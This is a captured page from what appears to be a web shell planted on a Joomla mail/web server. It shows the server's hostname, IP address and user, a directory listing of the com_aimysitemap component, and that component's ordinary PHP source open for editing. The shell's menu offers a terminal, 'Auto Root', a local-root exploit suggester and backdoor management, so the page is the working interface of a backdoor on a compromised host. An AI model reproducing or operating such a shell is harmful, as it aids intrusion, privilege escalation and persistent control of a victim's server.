Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
vnsm /
components /
com_aimysitemap /
Delete
Unzip
Name
Size
Permission
Date
Action
controllers
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
models
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
views
[ DIR ]
drwxr-xr-x
2025-02-08 22:29
aimysitemap.php
593
B
-rwxr-xr-x
2026-06-10 18:30
controller.php
466
B
-rwxr-xr-x
2026-06-10 18:30
index.html
14
B
-rwxr-xr-x
2026-06-10 18:30
router.php
901
B
-rwxr-xr-x
2026-06-10 18:30
Save
Rename
<?php /* * Copyright (c) 2017-2026 Aimy Extensions, Netzum Sorglos Software GmbH * Copyright (c) 2014-2017 Aimy Extensions, Lingua-Systems Software GmbH * * https://www.aimy-extensions.com/ * * License: GNU GPLv2, see LICENSE.txt within distribution and/or * https://www.aimy-extensions.com/software-license.html */ defined( '_JEXEC' ) or die(); use Joomla\CMS\MVC\Controller\BaseController; use Joomla\CMS\Factory; $controller = BaseController::getInstance( 'AimySitemap' ); $controller->execute( Factory::getApplication()->input->get( 'task' ) ); $controller->redirect();